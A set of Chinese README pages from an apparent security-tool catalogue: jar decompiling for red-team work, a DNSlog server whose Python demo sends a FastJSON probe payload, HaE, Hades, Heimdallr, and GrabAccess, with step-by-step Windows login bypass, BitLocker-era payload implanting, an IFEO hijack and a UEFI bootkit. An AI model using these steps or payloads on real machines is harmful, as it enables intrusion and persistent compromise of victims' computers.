stars](https://img.shields.io/github/stars/Ppsoft1991/CodeReviewTools.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.1.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20210323-green) 8 | 9 | 10 | 11 | HW竞争越来越激烈的年代,谁能在指定时间内打下更多的点,谁就能在内网中抢下先机。 12 | 13 | 在HW项目中,在有源码的情况下为了快速冲下一个站,势必需要提升自己看代码的速度,寻找最薄弱的环节。 14 | 15 | 在做项目的时候发现几个问题,第一个就是拿到目标网站的war包载入idea,发现缺少某些class 16 | 第二个就是某些class被分包编译在不同的jar包里面 17 | 18 | 我们想快速搜索代码中的关键点,就必须得对jar包进行反编译。所以我写了CodeReviewTools 19 | 20 | ## 🍭 目前功能 21 | 22 | - 通过正则搜索特定class名称 23 | - 通过正则直接反编译拥有特定groupId的jar包到某个目录 24 | 25 | ``` 26 | CodeReviewTools v1.0 by Ppsoft1991 27 | 28 | usage: java -jar CodeReviewTools.jar -m 29 | -d,--dir target path 30 | -f,--file target file 31 | -h,--help print help information 32 | -m,--method [search, unzip, decompiler, clear, all, war] 33 | -n,--name search class file or group name 34 | -o,--output output path 35 | ``` 36 | 37 | 38 | 工具release版本使用jdk 11.0.9编译,如需要1.8版本请自行下载源码编译使用 39 | 40 | ## 💡 例子 41 | - 获得war包,一键反编译classes 42 | 43 | ```java -jar CodeReviewTools.jar -m war -f webapps.war``` 44 | 45 | ![](https://github.com/Ppsoft1991/CodeReviewTools/raw/main/pic/2021-03-24_01-30.png) 46 | 47 | 会在-f制定的war包目录下生成对应的zip文件 48 | 49 | - 想快速寻找哪些jar包存在名为*Controller的jar文件 50 | 51 | ```java -jar CodeReviewTools.jar -m search -n "nc(.)*Controller\$" -d "home/"``` 52 | 53 | ![](https://github.com/Ppsoft1991/CodeReviewTools/raw/main/pic/2021-03-10_14-07.png) 54 | 55 | - 想快速解压jar包中包含groupId为com.yxxxx的jar并且反编译存储在/tmp/nc 56 | 57 | ```java -jar CodeReviewTools.jar -m all -n "com.yxxx(.)*" -d "home/lib" -o "/tmp/nc" ``` 58 | 59 | ![](https://github.com/Ppsoft1991/CodeReviewTools/raw/main/pic/2021-03-10_13-54.png) 60 | 61 | 效果: 62 | ![](https://github.com/Ppsoft1991/CodeReviewTools/raw/main/pic/2021-03-10_14-17.png) 63 | 64 | 65 | ## 项目相关 66 | 67 | 68 | ## 最近更新 69 | 70 | 71 | -------------------------------------------------------------------------------- /detail/DNSlog-GO.md: -------------------------------------------------------------------------------- 1 | ## DNSlog-GO 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-lanyi-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.5.7-red) 7 | ![Time](https://img.shields.io/badge/Join-20220316-green) 8 | 9 | 10 | DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带多用户WEB界面 11 | 12 | 演示截图: 13 | 14 | ![avatar](https://github.com/lanyi1998/DNSlog-GO/raw/master/images/demo.png) 15 | 16 | 安装 17 | --- 18 | 19 | 详细图文教程:https://mp.weixin.qq.com/s/m_UXJa0imfOi721bkBpwFg 20 | 21 | # 1.获取发行版 22 | 23 | 这里 https://github.com/lanyi1998/DNSlog-GO/releases 下载最新发行版,并解压 24 | 25 | 或者docker启动 26 | ```shell 27 | wget https://raw.githubusercontent.com/lanyi1998/DNSlog-GO/master/config.yaml 28 | #修改你的config.yaml文件 29 | docker run -d -p 53:53 -p 53:53/udp -p 8000:8000 -v `pwd`/config.yaml:/DNSlog-GO/config.yaml --name dnslog --privileged lanyi1998/dnslog-go:latest 30 | #设置开机启动 31 | docker update --restart=always dnslog 32 | ``` 33 | 34 | # 2.域名与公网 IP 准备 35 | 36 | ``` 37 | 搭建并使用 DNSLog,你需要拥有一个域名如(a.com),还需要有一个公网 IP 地址(如:1.1.1.1) 38 | 39 | 修改 a.com 的 NS 记录为 40 | 41 | NS1.vpsip.NIP.IO 42 | NS2.vpsip.NIP.IO 43 | 44 | 如 45 | ns1.1.1.1.1.nip.io 46 | ns1.1.1.1.1.nip.io 47 | 48 | 本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。 49 | 50 | 注意: NS 记录修改之后部分地区需要 24-48 小时会生效 51 | ``` 52 | 53 | # 3.修改配置文件 config.ini 54 | 55 | ``` 56 | HTTP: 57 | port: 8000 //http web监听端口 58 | #{"token":"用户对应子域名"} 59 | user: { "admin": "admin" } //用户admin 对应的dnslog子域名是 admin.demo.com 60 | consoleDisable: false //是否关闭web页面 61 | Dns: 62 | domain: demo.com //dnslog域名 63 | ``` 64 | 65 | # 4.启动对应系统的客户端 66 | 67 | **注意服务端重启以后,如果修改了用户对应子域名,必须清空一下浏览器中的localStorage,否则会获取不到数据** 68 | 69 | --- 70 | 71 | API Python Demo 72 | 73 | ```python 74 | import requests 75 | import random 76 | import json 77 | 78 | 79 | class DnsLog(): 80 | domain = "" 81 | token = "" 82 | Webserver = "" 83 | 84 | def __init__(self, Webserver, token): 85 | self.Webserver = Webserver # dnslog的http监听地址,格式为 ip:端口 86 | self.token = token # token 87 | # 检测DNSLog服务器是否正常 88 | try: 89 | res = requests.post("http://" + Webserver + "/api/verifyToken", json={"token": token}).json() 90 | self.domain = res.Msg 91 | except: 92 | exit("DnsLog 服务器连接失败") 93 | if res["Msg"] == "false": 94 | exit("DnsLog token 验证失败") 95 | 96 | # 生成随机子域名 97 | def randomSubDomain(self, length=5): 98 | subDomain = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', length)) + '.' + self.domain 99 | return subDomain 100 | 101 | # 验证子域名是否存在 102 | def checkDomain(self, domain): 103 | res = requests.post("http://" + self.Webserver + "/api/verifyDns", json={"Query": domain}, 104 | headers={"token": self.token}).json() 105 | if res["Msg"] == "false": 106 | return False 107 | else: 108 | return True 109 | 110 | 111 | url = "http://192.168.41.2:8090/" 112 | 113 | dns = DnsLog("1111:8888", "admin") 114 | 115 | subDomain = dns.randomSubDomain() 116 | 117 | payload = { 118 | "b": { 119 | "@type": "java.net.Inet4Address", 120 | "val": subDomain 121 | } 122 | } 123 | 124 | requests.post(url, json=payload) 125 | 126 | if dns.checkDomain(subDomain): 127 | print("存在FastJosn") 128 | ``` 129 | 130 | 131 | ## 项目相关 132 | 133 | 134 | ## 最近更新 135 | 136 | #### [v1.5.7] - 2025-04-09 137 | 138 | **修复** 139 | - 修复8.8.8.8无法收到记录的bug 140 | 141 | #### [v1.5.2] - 2022-06-08 142 | 143 | **更新** 144 | - 通过配置文件,可固定每个用户对应的子域名。避免每次重启后,用户对应的子域名发生变动 145 | 146 | 147 | -------------------------------------------------------------------------------- /detail/GrabAccess.md: -------------------------------------------------------------------------------- 1 | ## GrabAccess 2 | 3 | ![Language](https://img.shields.io/badge/Language-C-blue) 4 | ![Author](https://img.shields.io/badge/Author-Push3AX-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/Push3AX/GrabAccess.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20240805-green) 8 | 9 | 10 | ## GrabAccess 11 | 12 | **Bookit / Windows登陆密码和Bitlocker绕过工具** 13 | 14 | ------ 15 | 16 | [**中文**](https://github.com/Push3AX/GrabAccess/blob/main/readme_cn.md) | [English](https://github.com/Push3AX/GrabAccess/blob/main/readme.md) 17 | 18 | 在物理接触的情况下,GrabAccess可以: 19 | 20 | 1. 绕过Windows登陆密码执行任意操作(以System权限执行命令、重置Windows账户密码等) 21 | 2. 植入木马并添加自启动(可以绕过Bitlocker,但要求受害者登录) 22 | 3. 通过修改主板UEFI固件实现无视重装系统、更换硬盘的持久化(Bootkit) 23 | 24 | 25 | 26 | ## 快速开始 27 | 28 | GrabAccess最基础的功能是绕过Windows登录密码。 29 | 30 | 1. 准备一个U盘。(需为`FAT16`或`FAT32`格式) 31 | 32 | 2. 下载[GrabAccess_Release.zip](https://github.com/Push3AX/GrabAccess/releases/download/Version1.1/GrabAccess_Release_1.1.0.zip),解压到U盘根目录。 33 | 34 | ![1](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/1.png) 35 | 36 | 3. 将U盘插入目标计算机。重启,在启动时进入BIOS菜单。选择从U盘启动(如果开启了`Security Boot`,还需将其设置为`DISABLE`). 37 | 38 | ![2](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/2.png) 39 | 40 | 4. 在Windows启动时会弹出CMD窗口和账户管理窗口,可以System权限执行任意命令而无需登录。 41 | 42 | ![3](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/3.png) 43 | 44 | 5. 按下`ALT+F4`关闭CMD窗口后,Windows回到登陆界面。 45 | 46 | 47 | 48 | ## 自动化植入(支持绕过 Bitlocker) 49 | 50 | GrabAccess可以自动植入指定的程序,并为其添加启动项。 51 | 52 | 要使用该功能,需要预先将GrabAccess与要植入的程序打包: 53 | 54 | 1. 下载[GrabAccess_Release.zip](https://github.com/Push3AX/GrabAccess/releases/download/Version1.1/GrabAccess_Release_1.1.0.zip),解压并放置在U盘根目录。 55 | 56 | 2. 将需要植入的程序命名为`payload.exe`,放置在U盘根目录。 57 | 58 | 3. 运行`build.bat`进行打包。 59 | 60 | ![4](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/4.png) 61 | 62 | 4. 将U盘插入目标计算机、从U盘启动(与前文相同) 63 | 64 | 5. Windows启动后即可看到指定的程序。 65 | 66 | ![5](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/5.png) 67 | 68 | 该植入过程可以绕过Bitlocker的系统盘加密。 69 | 70 | 从含有GrabAccess的U盘启动后,GrabAccess就会写入到内存中。此时可以拔出U盘,但需要停留在Bitlocker输入密码的界面,等待受害者返回输入密码。当Bitlocker解锁之后,指定的程序会被写入磁盘。但在这之前,由于GrabAccess仅停留在内存,如果重启或关机,GrabAccess将会失效。 71 | 72 | 73 | 74 | ## 修改主板UEFI固件实现Bootkit 75 | 76 | GrabAccess可以被植入到计算机主板的UEFI固件。实现硬件级别的持久化(Bootkit)。 77 | 78 | 每次Windows系统启动时,GrabAccess会植入指定的程序,即使重装系统或更换硬盘之后也会重新植入。要移除它,只能刷写主板固件或更换主板。 79 | 80 | **警告:以下操作可能损坏主板!必须对UEFI固件有一定了解才可继续。AT YOUR OWN RISK !!!!** 81 | 82 | 要实现这一功能,大致分为四步: 83 | 84 | 1. 将GrabAccess与要植入的程序打包 85 | 2. 提取主板UEFI固件 86 | 3. 向UEFI固件插入GrabAccessDXE 87 | 4. 将固件刷回主板 88 | 89 | 不同主板的第2和第4步有较大不同。部分主板可以通过软件方式刷新固件,但也有部分主板存在校验,只能使用编程器刷新。因差异众多,在此不深入讨论,读者可以自行在网上搜索某型号主板对应的方式。 90 | 91 | 将GrabAccess与要植入的程序打包的方式与前文相同,即:将需要植入的程序命名为payload.exe,放置在GrabAccess的根目录,运行build.bat进行打包。结束后得到`native.exe`,稍后将会用到。 92 | 93 | 在提取到主板UEFI固件后,使用[UEFITool](https://github.com/LongSoft/UEFITool)打开,按下`Ctrl+F`,选择`Text`,搜索`pcibus`,在下方双击搜索到的第一项。 94 | 95 | ![6](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/6.png) 96 | 97 | 在`pcibus`这一项上右键,选择`Insert before`,然后选取[GrabAccess_Release.zip](https://github.com/Push3AX/GrabAccess/releases/download/Version1.1/GrabAccess_Release_1.1.0.zip)中`UEFI_FSS`文件夹的`GrabAccessDXE.ffs`。 98 | 99 | ![7](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/7.png) 100 | 101 | 插入`GrabAccessDXE`后,在`GrabAccessDXE`上右键,选择`Insert before`,插入`UEFI_FSS`文件夹的`native.ffs`。此时应该如下所示: 102 | 103 | ![8](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/8.png) 104 | 105 | 双击展开`native.ffs`(它没有名字,但GUID是`2136252F-5F7C-486D-B89F-545EC42AD45C`),在`Raw section`上右键,选择`Replace body`,然后选取前文中生成的`native.exe`进行替换。 106 | 107 | ![9](https://raw.githubusercontent.com/Push3AX/GrabAccess/main/images/9.png) 108 | 109 | 最后,点击File菜单的`Save image file`,保存固件到文件。 110 | 111 | 这份固件已经成功植入了Bootkit,将其刷回主板。如果一切顺利,在每一次Windows启动过程中,`native.exe`都会被写入并执行。 112 | 113 | 如果没有成功,可以尝试以下操作: 114 | 115 | 1. 关闭UEFI设置中的`Security Boot`和`CSM`,确定操作系统是通过UEFI模式加载的。 116 | 2. 向固件插入`UEFI_FSS`文件夹下的`pcddxe.ffs`(方法同前文。但注意,这个模块可能会与其它模块冲突造成不能开机,仅建议在使用编程器的情况下尝试!) 117 | 118 | 119 | 120 | ## 系统支持情况 121 | 122 | GrabAccess仅支持UEFI引导下的Windows系统,目前仅支持x64系统。 123 | 124 | 已测试Windows 10 (1803, 22H2)和Windows 11(23H2)。包括使用了TPM、联网账户、Pin码的情况。但不支持绕过Security Boot。 125 | 126 | 127 | 128 | # 原理解析 129 | 130 | ## Windows Platform Binary Table 131 | 132 | 和Kon-boot篡改Windows内核不同,GrabAccess的工作原理,源自于Windows的一项合法后门:WPBT(Windows Platform Binary Table)。 133 | 134 | WPBT常用于计算机制造商植入驱动管理软件、防丢软件。类似Bootkit病毒,一旦主板中存在WPBT条目,无论是重装系统还是更换硬盘,只要使用Windows系统,开机后都会被安装指定程序。 135 | 136 | WPBT的原始设计,应当是由生产商在主板的UEFI固件中插入一个特定的模块实现。但是,通过劫持UEFI的引导过程,攻击者可以插入WPBT条目,而无需修改主板固件。 137 | 138 | 139 | 140 | ## GrabAccess做了什么 141 | 142 | GrabAccess包含两个部分。 143 | 144 | 其一是用于写入WPBT条目的UEFI应用程序,即源码中的Stage1-UEFI。它们用于在UEFI环境下向ACPI表写入WPBT条目。 145 | 146 | 其二是一个Windows Native Application,即源码中的Stage2-NativeNT,用于写出最终Payload和添加启动项。 147 | 148 | 149 | 150 | ## Native Application做了什么 151 | 152 | WPBT所加载的应用程序,并非常规的Win32程序。而是一个Windows Native Application。它在Windows Native NT阶段执行,早于用户登录。但是Windows提供给Native APP的API,也少于Win32程序。 153 | 154 | 源码中的Stage2-NativeNT负责将其末尾的最终Payload(即用户打包的指定程序)写出到`C:\\Windows\\System32\\GrabAccess.exe`,并为其添加启动项`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GrabAccess`。 155 | 156 | 如果其末尾没有Payload,则通过IFEO劫持Logonui.exe,在Windows登录时显示cmd.exe和netplwiz.exe 157 | 158 | 159 | 160 | ## Credits 161 | 162 | 1. [Windows Platform Binary Table (WPBT) ](https://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx) 163 | 2. [WPBT-Builder ](https://github.com/tandasat/WPBT-Builder) 164 | 3. [Windows Native App by Fox](http://fox28813018.blogspot.com/2019/05/windows-platform-binary-table-wpbt-wpbt.html) 165 | 166 | 167 | 168 | ## 项目相关 169 | 170 | 171 | ## 最近更新 172 | 173 | 174 | -------------------------------------------------------------------------------- /detail/HaE.md: -------------------------------------------------------------------------------- 1 | ## HaE 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-gh0stkey-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V4.2.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20210120-green) 8 | 9 | 10 | ## 项目介绍 11 | 12 | **HaE**是一款**网络安全(数据安全)领域**下的框架式项目,采用了**乐高积木式**模块化设计理念,实现对HTTP消息(包含WebSocket)精细化的标记和提取。 13 | 14 | 通过运用**多引擎**的自定义正则表达式,HaE能够准确匹配并处理HTTP请求与响应报文(包含WebSocket),对匹配成功的内容进行有效的标记和信息抽取,从而提升网络安全(数据安全)领域下的**漏洞和数据分析效率**。 15 | 16 | > 随着现代化Web应用采用前后端分离的开发模式,日常漏洞挖掘的过程中,捕获的HTTP请求流量也相应增加。若想全面评估一个Web应用,会花费大量时间在无用的报文上。**HaE的出现旨在解决这类情况**,借助HaE,您能够**有效减少**测试时间,将更多精力集中在**有价值且有意义**的报文上,从而**提高漏洞挖掘效率**。 17 | 18 | GitHub项目地址:https://github.com/gh0stkey/HaE 19 | 20 | GitCode项目地址:https://gitcode.com/gh0stkey/HaE 21 | 22 | **所获荣誉**: 23 | 24 | 1. [入选2022年KCon兵器谱](https://mp.weixin.qq.com/s/JohMsl1WD29LHCHuLf8mVQ) 25 | 2. [入选GitCode G-Star项目](https://gitcode.com/gh0stkey/HaE) 26 | 27 | **注意事项**: 28 | 29 | 1. HaE 3.0版本开始采用`Montoya API`进行开发,使用新版HaE需要升级你的BurpSuite版本(>=2023.12.1)。 30 | 2. HaE 2.6版本后对规则字段进行了更新,因此无法适配<=2.6版本的规则,请用户自行前往[规则转换页面](https://gh0st.cn/HaE/ConversionRule.html)进行转换。 31 | 3. 自定义HaE规则必须用左右括号`()`将所需提取的表达式内容包含,例如你要匹配一个**Shiro应用**的响应报文,正常匹配规则为`rememberMe=delete`,在HaE的规则中就需要变成`(rememberMe=delete)`。 32 | 33 | ## 使用方法 34 | 35 | 插件装载: `Extender - Extensions - Add - Select File - Next` 36 | 37 | 初次装载`HaE`会从Jar包中加载离线的规则库,如果更新可以点击`Reinit`进行重新初始化。内置规则库地址可以在Github上找到:`https://github.com/gh0stkey/HaE/blob/master/src/main/resources/rules/Rules.yml`。 38 | 39 | 配置文件(`Config.yml`)和规则文件(`Rules.yml`)会放在固定目录下: 40 | 41 | 1. Linux/Mac用户的配置文件目录:`~/.config/HaE/` 42 | 2. Windows用户的配置文件目录:`%USERPROFILE%/.config/HaE/` 43 | 44 | 除此之外,您也可以选择将配置文件存放在`HaE Jar包`的同级目录下的`/.config/HaE/`中,**以便于离线携带**。 45 | 46 | ### 规则释义 47 | 48 | HaE目前的规则一共有8个字段,详细的含义如下所示: 49 | 50 | | 字段 | 含义 | 51 | |-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| 52 | | Name | 规则名称,主要用于简短概括当前规则的作用。 | 53 | | F-Regex | 规则正则,主要用于填写正则表达式。在HaE中所需提取匹配的内容需要用`(`、`)`将正则表达式进行包裹。| 54 | | S-Regex | 规则正则,作用及使用同F-Regex。S-Regex为二次正则,可以用于对F-Regex匹配的数据结果进行二次的匹配提取,如不需要的情况下可以留空。| 55 | | Format | 格式化输出,在NFA引擎的正则表达式中,我们可以通过`{0}`、`{1}`、`{2}`…的方式进行取分组格式化输出。默认情况下使用`{0}`即可。 | 56 | | Scope | 规则作用域,主要用于表示当前规则作用于HTTP报文的哪个部分。支持请求、响应的行、头、体,以及完整的报文。 | 57 | | Engine | 正则引擎,主要用于表示当前规则的正则表达式所使用的引擎。**DFA引擎**:对于文本串里的每一个字符只需扫描一次,速度快、特性少;**NFA引擎**:要翻来覆去标注字符、取消标注字符,速度慢,但是特性(如:分组、替换、分割)丰富。 | 58 | | Color | 规则匹配颜色,主要用于表示当前规则匹配到对应HTTP报文时所需标记的高亮颜色。在HaE中具备颜色升级算法,当出现相同颜色时会自动向上升级一个颜色进行标记。 | 59 | | Sensitive | 规则敏感性,主要用于表示当前规则对于大小写字母是否敏感,敏感(`True`)则严格按照大小写要求匹配,不敏感(`False`)则反之。 | 60 | 61 | ## 优势特点 62 | 63 | 1. **功能**:通过对HTTP报文的颜色高亮、注释和提取,帮助使用者获取有意义的信息,**聚焦高价值报文**。 64 | 2. **界面**:清晰可视的界面设计,以及**简洁的界面交互**,帮助使用者更轻松的了解和配置项目,**避免`多按钮`式的复杂体验**。 65 | 3. **查询**:将HTTP报文的高亮、注释和提取到的相关信息**集中在一个数据面板**,可以一键查询、提取信息,从而提高测试和梳理效率。 66 | 4. **算法**:内置高亮颜色的升级算法,当出现相同颜色时**会自动向上升级一个颜色**进行标记,**避免`屠龙者终成恶龙`场景**。 67 | 5. **管理**:**融入BurpSuite的项目数据管理**,当使用BurpSuite进行项目存储时HaE数据也会一并存储。 68 | 6. **实战**:官方规则库和规则字段作用功能,都是**基于实战化场景总结输出**的,**以此提高数据的有效性、精准性发现**。 69 | 70 | | 界面名称 | 界面展示 | 71 | | ------------------------ | ---------------------------------------------------- | 72 | | Rules(规则管理) | | 73 | | Config(配置管理) | | 74 | | Databoard(数据集合) | | 75 | | MarkInfo(数据展示) | | 76 | 77 | 78 | ## 项目相关 79 | 80 | 81 | ## 最近更新 82 | 83 | #### [v4.2.1] - 2025-05-08 84 | 85 | **功能更新** 86 | - 优化缓存池的存储逻辑,为正则部分添加缓存功能,一次编译多次使用。 87 | - 新增动态响应头配置,用于去除动态响应头便于缓存。 88 | - 新增3条规则,用于进行漏洞探测和验证:Vite DevMode、Passwd File、Win.ini File。 89 | **问题修复** 90 | - 为规则修改时候增加清空缓存机制,解决规则修改不生效问题。 91 | - 优化YAML加载逻辑,确保安全可控的进行配置文件加载。 92 | - 修复Config配置不能设为空的问题。 93 | 94 | #### [v4.1.2] - 2025-04-02 95 | 96 | **功能更新** 97 | - 优化Databoard存储逻辑,提升查询速度。 98 | - 优化Databoard双击搜索,提升检索效率。 99 | - 新增并调整Databoard的Action按钮菜单,提供缓存、数据的多维度清理。 100 | 101 | #### [v4.1.1] - 2025-03-25 102 | 103 | **功能更新** 104 | - 优化Databoard存储逻辑,提升数据处理速度。 105 | 106 | **问题修复** 107 | - 修复Databoard展示HTTP消息时存在的重复问题。 108 | 109 | #### [v4.1] - 2025-03-21 110 | 111 | **功能更新** 112 | - 优化数据导入逻辑,提高导入速度。 113 | - 优化Databoard查询逻辑,提高加载速度。 114 | - 优化内置规则,包含用户名、密码、敏感信息等字段内容。 115 | - 新增内置规则,包含PDF.js Viewer指纹匹配规则。 116 | - 恢复进度条等待功能,让用户可以直面数据加载过程。 117 | 118 | **问题修复** 119 | - 修复切换主题之后导致规则新增失灵的问题。 120 | 121 | #### [v4.0.5] - 2025-02-11 122 | 123 | **问题修复** 124 | - 优化项目存储时的逻辑,解决并发导致的出错 125 | 126 | 127 | -------------------------------------------------------------------------------- /detail/Hades.md: -------------------------------------------------------------------------------- 1 | ## Hades 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue) 4 | ![Author](https://img.shields.io/badge/Author-theSecHunter-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.1.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20220829-green) 8 | 9 | 10 | 11 | [English](https://github.com/theSecHunter/Hades/blob/main/README.md) | 中文文档 12 | 13 | Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。 14 | 15 | - [Hboat (服务端 demo)](https://github.com/theSecHunter/Hboat) 16 | - [Hades-Windows](https://github.com/theSecHunter/Hades-Linux) @TimelifeCzy 17 | - [Hades-Linux](https://github.com/chriskaliX/Hades) @chriskaliX 18 | 19 | 目前该仓库为其他组件的整合,可以点击上述链接获取组件详情 20 | 21 | 22 | 23 | 24 | ## 项目相关 25 | 26 | 27 | ## 最近更新 28 | 29 | #### [v1.1.0] - 2023-01-31 30 | 31 | **更新** 32 | - ebpf插件支持arm64,支持简易端口扫描检测以及其余问题修复 33 | - win插件支持进程拦截、注册表拦截、目录保护、注入检测 34 | 35 | 36 | -------------------------------------------------------------------------------- /detail/Heimdallr.md: -------------------------------------------------------------------------------- 1 | ## Heimdallr 2 | 3 | ![Language](https://img.shields.io/badge/Language-JavaScript-blue) 4 | ![Author](https://img.shields.io/badge/Author-graynjo-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/graynjo/Heimdallr.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.1.3-red) 7 | ![Time](https://img.shields.io/badge/Join-20221117-green) 8 | 9 | 10 | **Heimdallr**是一款致力于被动嗅探浏览器流量,用于**提示漏洞框架指纹**、**告警拦截蜜罐请求**、**对抗浏览器特征追踪**(浏览器持久化、webRTC、Canvas画布等)的Chrome插件。 11 | 12 | ![image-20221017154419189](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221017154419189.png) 13 | 14 | ![image-20221017154934546](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221017154934546.png) 15 | 16 | ## 🥑安装 17 | 18 | 1. GitHub Releases 下载插件最新编译版本 19 | 2. Chrome浏览器-扩展设置-开发者模式-加载已解压的扩展程序 20 | 21 | ![image-20221017154934546](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221104111153079.png) 22 | 23 | > 注意:Chrome版本需高于Chrome v96,部分代码逻辑不适配edge和firefox,请勿混用于非Chrome浏览器 24 | 25 | ## 🚀使用 26 | 27 | ### 基本功能 28 | 29 | 高危漏洞资产指纹识别和蜜罐jsonp请求识别功能无需配置,只要插件开启即可生效。 30 | 31 | - 高危漏洞资产指纹识别规则103条,涉及框架或产品如下: 32 | 33 | > ueditor、struts2、spring、weblogic、shiro、F5 BIG-IP、致远OA、用友NC、用友畅捷通、通达OA、心通达OA、新点OA、帆软报表、蓝凌OA、红帆OA、华天动力OA、万户OA、金蝶云、协众OA、金和OA、海昌OA、泛微多个产品(ecology、eoffice、ebridge、emobile)、拓尔思SSO、拓尔思内容管理系统、亿邮邮件、coremail邮件、Exchange邮件、若依后台管理系统、Wordpress、小鱼易连云视讯、tomcat、iis、jboss、jetty、ibm websphere、weblogic、thinkphp、showdoc、Laravel、kindeditor、fckeditor、ewebeditor、jeesite、海康威视多个产品(网络摄像头、安防管理平台、图像综合应用平台)、dedecms、jira、confluence、java web、博达站群、dubbo、向日葵客户端、宝塔waf、宝塔面板、米拓cms、teleport堡垒机、齐治堡垒机、帕拉迪堡垒机、H3C堡垒机、绿盟防火墙、安全狗Waf 34 | 35 | - 蜜罐特征告警规则151条,涉及敏感域名请求(jsonp)、蜜罐网页资源特征、蜜罐对本机特殊软件(如Burpsuite)的探测请求、网站流量分析与跟踪请求、敏感关键词、敏感脚本调用等。 36 | 37 | > 为了保证请求的最全面捕获,Heimdallr中不进行请求种类(如script、XMLHttpRequest等)的筛选,因此插件默认只进行蜜罐请求识别而不作拦截,若开启蜜罐请求拦截会影响正常访问CSDN、Github等网站的正常访问,可以通过日常使用时暂停插件(控制-暂停/开启插件)或关闭蜜罐拦截功能(策略配置-蜜罐拦截配置)解决。 38 | > 39 | > 因部分框架或产品(如百度网站在线客服会调用5个敏感域名、高德地图嵌入会调用高德域名)的正常使用也会出现Jsonp敏感域名的访问,故同一站点的Jsonp请求超过10个时,基本可以确定为蜜罐站点,此时将会出现系统弹窗告警(弹窗需要操作系统开启浏览器弹窗权限,该权限默认开启)。低于10个的敏感域名请求,使用者可根据当前站点内容和告警域名的关联度进行判断,例如某个小企业官网可能调用百度商桥接口实现在线客服功能,但一般不会调用虎牙直播账号接口或联通一键登录热点溯源接口。 40 | 41 | ### 控制 42 | 43 | 右上角三个选项分别为暂停/开启插件、清除所有嗅探结果集、设置选项。 44 | 45 | > 暂停插件后,会清空所有页面的嗅探结果集,关闭对请求和响应的监听,扩展功能中仅WebRTC防护功能不关闭,其他的功能都会随插件暂停而暂停。 46 | 47 | ### 扩展功能 48 | 49 | 扩展功能由策略配置页面配置 50 | 51 | ![image-20221017093032294](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221017093032294.png) 52 | 53 | #### 被动识别配置-启用响应体规则匹配 54 | 55 | - 建议设置:仅在攻击期间对需高度关注页面(口子、靶标)开启该选项,用完即关 56 | 57 | > 默认情况下,被动嗅探只对请求响应的URL、Request Header、Request Body、Response Header进行匹配,仅有较少部分高危指纹在Response Body中检测,开启该选项后会启用devtools调用chrome devtools protocol,检测Response Body中的指纹。但是启用该选项后会出现调试提示栏,如需关闭参考高级-4 58 | 59 | #### 被动识别配置-关闭浏览器页面缓存(强制刷新) 60 | 61 | - 建议设置:默认开启该选项 62 | 63 | > 部分包含特征规则的静态资源(如JS文件)会在一次调用后存储在磁盘中,减少重复加载耗费的流量和带宽。这会导致识别规则在重复刷新页面是不会重复触发。开启该选项后可以达到更完善的特征识别,这也可以防止部分情况下静态资源文件不能及时更新导致的访问异常 64 | 65 | #### 蜜罐拦截配置-符合蜜罐特征请求自动拦截 66 | 67 | - 建议设置:攻击期间开启,日常使用时关闭 68 | 69 | > 为保证能够识别、阻断部分新的Jsonp请求,插件按照请求域名进行拦截,这会导致开启该选项后访问部分日常网站(CSDN、GitHub等)会被阻断,影响日常访问。因此默认情况下插件不会拦截疑似蜜罐的Jsonp请求,需要手动开启拦截选项.日常网站被拦截也可以通过右上角的暂停插件按钮暂停,访问结束后重新启动插件。但是更建议的方式为日常使用浏览器和攻击使用浏览器分离开来,专事专用 70 | 71 | #### 特征对抗配置-清除所有浏览器持久化项数据 72 | 73 | - 建议设置:在被cookie追踪或其他持久化手段追踪浏览器特征时清除数据 74 | 75 | > 清除的浏览器持久化项包括:网站应用缓存(appcache)、网站资源缓存、网站缓存存储、Cookie、网络文件系统、表单数据记录、索引数据库(indexDB)、localStorage、密码记录、网络SQL数据(webSQL) 76 | > 77 | > 